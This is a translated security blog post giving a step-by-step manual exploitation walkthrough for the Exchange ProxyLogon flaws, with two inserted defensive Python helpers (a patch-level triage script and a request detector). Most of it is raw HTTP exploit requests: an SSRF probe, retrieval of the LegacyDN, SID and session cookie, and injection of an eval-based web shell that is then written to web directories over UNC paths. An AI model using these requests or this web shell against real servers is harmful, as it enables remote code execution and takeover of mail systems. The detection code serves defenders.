Do not use this for illegal penetration; I am not responsible for any consequences!
Vulnerability overview:
CVE-2021-26855, also known as ProxyLogon, lets an attacker bypass authentication through an SSRF; combined with other Exchange vulnerabilities of the same period, such as the file write CVE-2021-27065, it gives remote code execution.
Affected versions:
Exchange Server 2019 < 15.02.0792.010
Exchange Server 2019 < 15.02.0721.013
Exchange Server 2016 < 15.01.2106.013
Exchange Server 2013 < 15.00.1497.012
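An added example, not from the original post: a Python helper that classifies a reported Exchange build against the fixed builds listed above, so an inventory can be triaged before anything else is checked. The hostnames in the sample inventory are made up, and a build is only called vulnerable or patched when it sits on a cumulative-update line the table names.

```python
import re

# Fixed builds exactly as listed above; the same 15.xx.yyyy prefix identifies one cumulative-update line.
FIXED_BUILDS = {
    "Exchange Server 2019": ("15.02.0792.010", "15.02.0721.013"),
    "Exchange Server 2016": ("15.01.2106.013",),
    "Exchange Server 2013": ("15.00.1497.012",),
}
# Get-ExchangeServer prints AdminDisplayVersion as "Version 15.2 (Build 792.10)"; accept that form too.
ADMIN_DISPLAY = re.compile(r"Version (\d+)\.(\d+) \(Build (\d+)\.(\d+)\)")


def parse_build(text):
    """Return (major, minor, build, revision) from '15.02.0792.010' or the AdminDisplayVersion form."""
    m = ADMIN_DISPLAY.search(text)
    parts = m.groups() if m else text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("unrecognised build string: %r" % text)
    return tuple(int(p) for p in parts)


def assess_build(text):
    """Classify a build as (product, status), status in {'vulnerable', 'patched', 'not_listed'}."""
    reported = parse_build(text)
    product = "unknown"
    for name, fixed_builds in FIXED_BUILDS.items():
        for fixed in fixed_builds:
            fixed_t = parse_build(fixed)
            if reported[:2] == fixed_t[:2]:
                product = name  # major.minor identifies the product line
            if reported[:3] == fixed_t[:3]:  # same CU line: only the revision decides
                return name, ("vulnerable" if reported[3] < fixed_t[3] else "patched")
    return product, "not_listed"  # CU line not in the table above, so no verdict is claimed


def triage(inventory):
    """Map {host: build string} to {host: (product, status)}; unparsable strings are flagged, not skipped."""
    result = {}
    for host, build in inventory.items():
        try:
            result[host] = assess_build(build)
        except ValueError:
            result[host] = ("unknown", "unparsable")
    return result


if __name__ == "__main__":
    # Constructed inventory: hostnames and builds are made up for this example.
    sample = {"ex01.example.test": "Version 15.2 (Build 721.2)", "ex02.example.test": "15.02.0792.010",
              "ex03.example.test": "15.01.2044.004", "ex04.example.test": "garbage"}
    for host, (product, status) in sorted(triage(sample).items()):
        print("%-18s %-20s %s" % (host, product, status))
```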
POC:
If the response headers contain the two fields X-CalculatedBETarget and X-FEServer, the target is vulnerable.
GET /ecp/fd45e2.png HTTP/1.1
Host: xx.xxx
Cookie: X-BEResource=localhost~1942062522;
Reproduction:
1. Obtain the LegacyDN.
The two approaches below can obtain the target's domain name; there are others as well.
(1) This POC also reveals the domain name:
https://domain/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%3[email protected]
(2) The first step of ProxyShell also yields the LegacyDN; see:
YongYe 安全, WeChat public account YongYe 安全实验室: ProxyShell, detailed manual reproduction, CVE chain attack on Exchange to GetShell. The most detailed reproduction on the web!
Once the domain name is known, obtain the LegacyDN. There are other ways to obtain the LegacyDN as well.
POST /ecp/333.js HTTP/1.1
Cookie: X-BEResource=域名.local/autodiscover/autodiscover.xml?a=~1942062522;
Content-Type: text/xml
Content-Length: 377
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>[email protected]</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
The response below, at any point in the process, means there is a problem with the domain name; check the domain.
HTTP/2 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Request-Id: 63726196-d769-487e-b447-c7
X-Calculatedbetarget: rexxx.local
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Feserver: VS3
Date: Thu, 15 Jun 2023 02:36:01 GMT
Content-Length: 88
NegotiateSecurityContext failed with for host 'rexxxx.local' with status 'TargetUnknown'
Tips: anything can follow /ecp/. If you cannot obtain the LegacyDN this way, switch to another method instead of getting stuck on this one.
2. Obtain the SID
POST /ecp/333.js HTTP/2
Cookie: X-BEResource=administrator@域名:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
Content-Type: application/mapi-http
X-Requesttype: Connect
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:2
Content-Length: 147
legacyDn\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00
Tips:
(1) Note the port 444 in the cookie; without it the SID cannot be retrieved.
(2) If you do not understand how the Data is submitted, see the ProxyShell article.
3. Obtain the cookie
POST /ecp/333.js HTTP/2
Host:
Cookie: [email protected]:444/ecp/proxyLogon.ecp?a=~1942062522;
Content-Type: text/xml
Msexchlogonmailbox: S-1-5-20
Content-Length: 93
<r at="NTLM" ln="Administrator"><s t="0">SID</s></r>
4. Write the shell, in three steps.
(1) Use the GetList endpoint of the DDI component to obtain the RawIdentity (the GetObject endpoint sometimes returns NULL).
This part follows G3et's article:
G3et, WeChat public account Hack Party: Exchange ProxyLogon vulnerability reproduction, with a batch scanning POC.
POST /ecp/333.js HTTP/2
Host:
Cookie: X-BEResource=administrator@XXXX:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary=tQInySwhZ0-Jg2pk-I-a2VU41ITRbttmRNRJjxpBKw1pOyT_sPDikSeu50Q.&a=~1942062522; ASP.NET_SessionId=8ae71da5-f5-ab9-bf-5a5c822e3c96; msExchEcpCanary=tQInySwhZ0-Jg2pk-I-a2VU41ITRbt5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.
Content-Type: application/json;
Msexchlogonmailbox: S-1-5-20
Content-Length: 247
{"filter": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}}
Tips: response codes 500 and 411 need your own investigation; I did not look into them in depth.
(2) Inject the WebShell through the ExternalUrl attribute of the virtual directory.
The ExternalUrl field holds the shell.
POST /ecp/333.js HTTP/2
Host:
Cookie: X-BEResource=administrator@XXXX:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=tQInySwhZ0-Jg2pk-I-NvPqeCJS5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.&a=~1942062522; ASP.NET_SessionId=e71da5-f5-b9-b3bf-5a5c822e3c96; msExchEcpCanary=tQInySwhZ0-Jg2pk-I-sINiqzvPqeCJS5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.
Content-Type: application/json;
Msexchlogonmailbox: S-1-5-20
Content-Length: 481
{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": "670ab7cf-e053-4baa-9182-e5f"
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://ffff/#<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["PASSWORD"],"unsafe");}</script> "
}
}
}
(3) Trigger the backup performed on reset, which writes the file to the specified UNC path.
Any of these paths can be written to.
\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\1.aspx
\\127.0.0.1\c$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\1.aspx
\\127.0.0.1\c$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\1.aspx
\\127.0.0.1\c$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\1.aspx
\\127.0.0.1\c$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\premium\1.aspx
\\127.0.0.1\c$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\1.aspx
\\127.0.0.1\c$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\1.aspx
POST /ecp/333.js HTTP/2
Host:
Cookie: X-BEResource=Administrator@xxxxx:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=MYU5tQGg_Uy9sNsEvjDxaif2q77cbtsINjWbeLtVJFrNVJ0IXoxcaBVSN6mJgLZSU8LWmSAYOqc.&a=~1942062522; ASP.NET_SessionId=12d39774-f175-48cd-8a49-e5a077a1763b; msExchEcpCanary=MYU5tQGg_Uy9sNsEvjDxaif2q77cbtsINjWbeLtVJFrNVJ0IXoxcaBVSN6mJgLZSU8LWmSAYOqc.
Content-Type: application/json; charset=utf-8
Msexchlogonmailbox: S-1-5-21
Content-Length: 330
{"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": "25b3d2be-6a28-44d8-acd8-6e2"}, "properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\usacd.txt"}}}
Tips:
1. The WebShell content must avoid special characters that would be URL-encoded, and must not exceed 255 characters.
2. In practice, many attempts fail because of conditions in the target environment.
This article analyses the underlying mechanism in detail and is useful for troubleshooting: https://hosch3n.github.io/2021/08/22/ProxyLogon%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
Recap:
1. Obtain the LegacyDN and SID through the SSRF.
2. Use the SID to obtain the cookie.
3. Use the cookie to perform the malicious SetObject on the OABVirtualDirectory object and write the shell.
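As an added example that is not part of the original post: Python detection logic that flags the request shapes the chain above depends on (an X-BEResource cookie arriving from outside, the DDI SetObject endpoint reached through it, server-side script in ExternalUrl, a UNC FilePathName) when run over captured requests. It assumes full requests are available from a reverse proxy or WAF capture, since the HttpProxy logs do not record cookies; the sample requests are constructed from the post's own with made-up hosts and the shell body redacted.

```python
import re

# Detection rules for the request shapes used in the walkthrough above.
STATIC_ECP_PATH = re.compile(r"^/ecp/[^?]*\.(js|png|css|gif)(\?|$)", re.I)
SCRIPT_IN_URL = re.compile(r'"ExternalUrl"\s*:.{0,300}?(<script|runat\s*=|eval\()', re.I | re.S)
UNC_FILE_PATH = re.compile(r'"FilePathName"\s*:\s*"\\{1,4}[\w.]+\\{1,2}\w\$', re.I)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.strip("\n").replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def analyze_request(raw):
    """Return the ProxyLogon indicators present in one captured request (empty list if none)."""
    method, path, headers, body = parse_request(raw)
    cookie = headers.get("cookie", "").lower()
    hits = []
    if "x-beresource=" in cookie:  # front-end to back-end routing cookie; never legitimate from a client
        hits.append("X-BEResource cookie sent by external client")
        if "/ecp/ddi/ddiservice.svc/" in cookie:
            hits.append("DDI service reached through X-BEResource")
    if method == "POST" and STATIC_ECP_PATH.match(path):
        hits.append("POST body sent to static-looking /ecp/ path")
    if "msexchlogonmailbox" in headers:
        hits.append("client-supplied Msexchlogonmailbox header")
    if SCRIPT_IN_URL.search(body):
        hits.append("server-side script in OAB ExternalUrl")
    if UNC_FILE_PATH.search(body):
        hits.append("UNC FilePathName in SetObject body")
    return hits


# Constructed samples modelled on the post's requests; hosts and values are made up, shell body redacted.
PROBE = "GET /ecp/fd45e2.png HTTP/1.1\nHost: mail.example.test\nCookie: X-BEResource=localhost~1942062522;\n\n"
DDI_HEAD = ("POST /ecp/333.js HTTP/2\nHost: mail.example.test\nCookie: X-BEResource=administrator@mail.example.test"
            ":444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&a=~1942062522;\n"
            "Content-Type: application/json\nMsexchlogonmailbox: S-1-5-20\n\n")
SET_URL = DDI_HEAD + '{"properties": {"Parameters": {"ExternalUrl": "http://x/#<script runat=\\"server\\">REDACTED</script>"}}}'
WRITE = DDI_HEAD + r'{"properties": {"Parameters": {"FilePathName": "\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\x.aspx"}}}'

if __name__ == "__main__":
    for name, raw in (("probe", PROBE), ("set-externalurl", SET_URL), ("unc-write", WRITE)):
        print(name, analyze_request(raw) or ["no indicators"])
```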
Originally published on the WeChat public account YongYe 安全实验室: ProxyLogon, manual reproduction with POC/EXP, Exchange chained attack.